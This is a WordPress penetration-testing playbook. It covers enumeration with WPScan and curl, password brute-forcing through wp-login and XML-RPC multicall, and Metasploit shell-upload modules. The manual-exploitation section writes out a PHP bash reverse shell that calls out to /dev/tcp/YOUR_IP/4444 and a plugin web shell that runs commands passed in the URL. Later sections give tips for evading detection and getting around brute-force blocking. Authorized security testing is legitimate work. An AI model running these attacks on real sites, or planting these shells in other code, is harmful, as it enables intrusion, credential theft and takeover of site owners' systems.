WordPress Penetration Testing

Purpose

Conduct comprehensive security assessments of WordPress installations including enumeration of users, themes, and plugins, vulnerability scanning, credential attacks, and exploitation techniques. WordPress powers approximately 35% of websites, making it a critical target for security testing.

Prerequisites

Required Tools

• WPScan (pre-installed in Kali Linux)

• Metasploit Framework

• Burp Suite or OWASP ZAP

• Nmap for initial discovery

• cURL or wget

Required Knowledge

• WordPress architecture and structure

• Web application testing fundamentals

• HTTP protocol understanding

• Common web vulnerabilities (OWASP Top 10)

Outputs and Deliverables

• WordPress Enumeration Report - Version, themes, plugins, users

• Vulnerability Assessment - Identified CVEs and misconfigurations

• Credential Assessment - Weak password findings

• Exploitation Proof - Shell access documentation

Core Workflow

Phase 1: WordPress Discovery

Identify WordPress installations:

Check for WordPress indicators

curl -s http://target.com | grep -i wordpress curl -s http://target.com | grep -i "wp-content" curl -s http://target.com | grep -i "wp-includes"

Check common WordPress paths

curl -I http://target.com/wp-login.php curl -I http://target.com/wp-admin/ curl -I http://target.com/wp-content/ curl -I http://target.com/xmlrpc.php

Check meta generator tag

curl -s http://target.com | grep "generator"

Nmap WordPress detection

nmap -p 80,443 --script http-wordpress-enum target.com

Key WordPress files and directories:

• /wp-admin/

• Admin dashboard

• /wp-login.php

• Login page

• /wp-content/

• Themes, plugins, uploads

• /wp-includes/

• Core files

• /xmlrpc.php

• XML-RPC interface

• /wp-config.php

• Configuration (not accessible if secure)

• /readme.html

• Version information

Phase 2: Basic WPScan Enumeration

Comprehensive WordPress scanning with WPScan:

Basic scan

wpscan --url http://target.com/wordpress/

With API token (for vulnerability data)

wpscan --url http://target.com --api-token YOUR_API_TOKEN

Aggressive detection mode

wpscan --url http://target.com --detection-mode aggressive

Output to file

wpscan --url http://target.com -o results.txt

JSON output

wpscan --url http://target.com -f json -o results.json

Verbose output

wpscan --url http://target.com -v

Phase 3: WordPress Version Detection

Identify WordPress version:

WPScan version detection

wpscan --url http://target.com

Manual version checks

curl -s http://target.com/readme.html | grep -i version curl -s http://target.com/feed/ | grep -i generator curl -s http://target.com | grep "?ver="

Check meta generator

curl -s http://target.com | grep 'name="generator"'

Check RSS feeds

curl -s http://target.com/feed/ curl -s http://target.com/comments/feed/

Version sources:

• Meta generator tag in HTML

• readme.html file

• RSS/Atom feeds

• JavaScript/CSS file versions

Phase 4: Theme Enumeration

Identify installed themes:

Enumerate all themes

wpscan --url http://target.com -e at

Enumerate vulnerable themes only

wpscan --url http://target.com -e vt

Theme enumeration with detection mode

wpscan --url http://target.com -e at --plugins-detection aggressive

Manual theme detection

curl -s http://target.com | grep "wp-content/themes/" curl -s http://target.com/wp-content/themes/

Theme vulnerability checks:

Search for theme exploits

searchsploit wordpress theme <theme_name>

Check theme version

curl -s http://target.com/wp-content/themes/&#x3C;theme>/style.css | grep -i version curl -s http://target.com/wp-content/themes/&#x3C;theme>/readme.txt

Phase 5: Plugin Enumeration

Identify installed plugins:

Enumerate all plugins

wpscan --url http://target.com -e ap

Enumerate vulnerable plugins only

wpscan --url http://target.com -e vp

Aggressive plugin detection

wpscan --url http://target.com -e ap --plugins-detection aggressive

Mixed detection mode

wpscan --url http://target.com -e ap --plugins-detection mixed

Manual plugin discovery

curl -s http://target.com | grep "wp-content/plugins/" curl -s http://target.com/wp-content/plugins/

Common vulnerable plugins to check:

Search for plugin exploits

searchsploit wordpress plugin <plugin_name> searchsploit wordpress mail-masta searchsploit wordpress slideshow gallery searchsploit wordpress reflex gallery

Check plugin version

curl -s http://target.com/wp-content/plugins/&#x3C;plugin>/readme.txt

Phase 6: User Enumeration

Discover WordPress users:

WPScan user enumeration

wpscan --url http://target.com -e u

Enumerate specific number of users

wpscan --url http://target.com -e u1-100

Author ID enumeration (manual)

for i in {1..20}; do curl -s "http://target.com/?author=$i" | grep -o 'author/[^/]*/' done

JSON API user enumeration (if enabled)

curl -s http://target.com/wp-json/wp/v2/users

REST API user enumeration

curl -s http://target.com/wp-json/wp/v2/users?per_page=100

Login error enumeration

curl -X POST -d "log=admin&pwd=wrongpass" http://target.com/wp-login.php

Phase 7: Comprehensive Enumeration

Run all enumeration modules:

Enumerate everything

wpscan --url http://target.com -e at -e ap -e u

Alternative comprehensive scan

wpscan --url http://target.com -e vp,vt,u,cb,dbe

Enumeration flags:

at - All themes

vt - Vulnerable themes

ap - All plugins

vp - Vulnerable plugins

u - Users (1-10)

cb - Config backups

dbe - Database exports

Full aggressive enumeration

wpscan --url http://target.com -e at,ap,u,cb,dbe
--detection-mode aggressive
--plugins-detection aggressive

Phase 8: Password Attacks

Brute-force WordPress credentials:

Single user brute-force

wpscan --url http://target.com -U admin -P /usr/share/wordlists/rockyou.txt

Multiple users from file

wpscan --url http://target.com -U users.txt -P /usr/share/wordlists/rockyou.txt

With password attack threads

wpscan --url http://target.com -U admin -P passwords.txt --password-attack wp-login -t 50

XML-RPC brute-force (faster, may bypass protection)

wpscan --url http://target.com -U admin -P passwords.txt --password-attack xmlrpc

Brute-force with API limiting

wpscan --url http://target.com -U admin -P passwords.txt --throttle 500

Create targeted wordlist

cewl http://target.com -w wordlist.txt wpscan --url http://target.com -U admin -P wordlist.txt

Password attack methods:

• wp-login

• Standard login form

• xmlrpc

• XML-RPC multicall (faster)

• xmlrpc-multicall

• Multiple passwords per request

Phase 9: Vulnerability Exploitation

Metasploit Shell Upload

After obtaining credentials:

Start Metasploit

msfconsole

Admin shell upload

use exploit/unix/webapp/wp_admin_shell_upload set RHOSTS target.com set USERNAME admin set PASSWORD jessica set TARGETURI /wordpress set LHOST <your_ip> exploit

Plugin Exploitation

Slideshow Gallery exploit

use exploit/unix/webapp/wp_slideshowgallery_upload set RHOSTS target.com set TARGETURI /wordpress set USERNAME admin set PASSWORD jessica set LHOST <your_ip> exploit

Search for WordPress exploits

search type:exploit platform:php wordpress

Manual Exploitation

Theme/plugin editor (with admin access):

// Navigate to Appearance > Theme Editor // Edit 404.php or functions.php // Add PHP reverse shell:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>

// Or use weevely backdoor // Access via: http://target.com/wp-content/themes/theme_name/404.php

Plugin upload method:

Create malicious plugin

cat > malicious.php << 'EOF' <?php /* Plugin Name: Malicious Plugin Description: Security Testing Version: 1.0 */ if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?> EOF

Zip and upload via Plugins > Add New > Upload Plugin

zip malicious.zip malicious.php

Access webshell

curl "http://target.com/wp-content/plugins/malicious/malicious.php?cmd=id"

Phase 10: Advanced Techniques

XML-RPC Exploitation

Check if XML-RPC is enabled

curl -X POST http://target.com/xmlrpc.php

List available methods

curl -X POST -d '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName></methodCall>' http://target.com/xmlrpc.php

Brute-force via XML-RPC multicall

cat > xmlrpc_brute.xml << 'EOF' <?xml version="1.0"?> <methodCall> <methodName>system.multicall</methodName> <params> <param><value><array><data> <value><struct> <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member> <member><name>params</name><value><array><data> <value><string>admin</string></value> <value><string>password1</string></value> </data></array></value></member> </struct></value> <value><struct> <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member> <member><name>params</name><value><array><data> <value><string>admin</string></value> <value><string>password2</string></value> </data></array></value></member> </struct></value> </data></array></value></param> </params> </methodCall> EOF

curl -X POST -d @xmlrpc_brute.xml http://target.com/xmlrpc.php

Scanning Through Proxy

Use Tor proxy

wpscan --url http://target.com --proxy socks5://127.0.0.1:9050

HTTP proxy

wpscan --url http://target.com --proxy http://127.0.0.1:8080

Burp Suite proxy

wpscan --url http://target.com --proxy http://127.0.0.1:8080 --disable-tls-checks

HTTP Authentication

Basic authentication

wpscan --url http://target.com --http-auth admin:password

Force SSL/TLS

wpscan --url https://target.com --disable-tls-checks

Quick Reference

WPScan Enumeration Flags

Flag Description

-e at

All themes

-e vt

Vulnerable themes

-e ap

All plugins

-e vp

Vulnerable plugins

-e u

Users (1-10)

-e cb

Config backups

-e dbe

Database exports

Common WordPress Paths

Path Purpose

/wp-admin/

Admin dashboard

/wp-login.php

Login page

/wp-content/uploads/

User uploads

/wp-includes/

Core files

/xmlrpc.php

XML-RPC API

/wp-json/

REST API

WPScan Command Examples

Purpose Command

Basic scan wpscan --url http://target.com

All enumeration wpscan --url http://target.com -e at,ap,u

Password attack wpscan --url http://target.com -U admin -P pass.txt

Aggressive wpscan --url http://target.com --detection-mode aggressive

Constraints and Limitations

Legal Considerations

• Obtain written authorization before testing

• Stay within defined scope

• Document all testing activities

• Follow responsible disclosure

Technical Limitations

• WAF may block scanning

• Rate limiting may prevent brute-force

• Some plugins may have false negatives

• XML-RPC may be disabled

Detection Evasion

• Use random user agents: --random-user-agent

• Throttle requests: --throttle 1000

• Use proxy rotation

• Avoid aggressive modes on monitored sites

Troubleshooting

WPScan Shows No Vulnerabilities

Solutions:

• Use API token for vulnerability database

• Try aggressive detection mode

• Check for WAF blocking scans

• Verify WordPress is actually installed

Brute-Force Blocked

Solutions:

• Use XML-RPC method instead of wp-login

• Add throttling: --throttle 500

• Use different user agents

• Check for IP blocking/fail2ban

Cannot Access Admin Panel

Solutions:

• Verify credentials are correct

• Check for two-factor authentication

• Look for IP whitelist restrictions

• Check for login URL changes (security plugins)